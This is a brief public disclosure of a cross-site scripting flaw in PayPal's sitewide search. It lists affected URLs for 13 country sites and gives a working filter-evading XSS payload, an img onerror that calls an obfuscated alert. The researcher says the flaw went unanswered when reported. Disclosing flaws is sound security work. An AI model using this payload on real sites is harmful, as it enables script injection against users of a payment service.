The sitewide search functionality in PayPal suffers from a cross site scripting vulnerability.
ae6f81d653037a6970d54135bf3aa3926b4d02177b5fea9343cd38d0f832748a
======================================================================
_ _ _____ __ __
| | | | | _ | \ \ / /
| | | |_ __ | |/' |_ ___ __ \ V /
| | | | '_ \| /| \ \ /\ / / '_ \ / \
| |_| | | | \ |_/ /\ V V /| | | | / /^\ \
\___/|_| |_|\___/ \_/\_/ |_| |_| \/ \/
______
|______|
=======================================================================
Hello I saw about the paypal XSS vulnerability and I researched more and more.
I found out that 13 more countries are affected with this xss attack.
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img>
Image: http://www.anony.ws/i/2013/05/26/NTuWS.png
I reported them and I did not get any reply. Please make them aware about this vulnerability. I am giving this is out for the awareness
Researcher: Un0wn_X
Email: unonwsec@gmail.com
Follow @UnownSec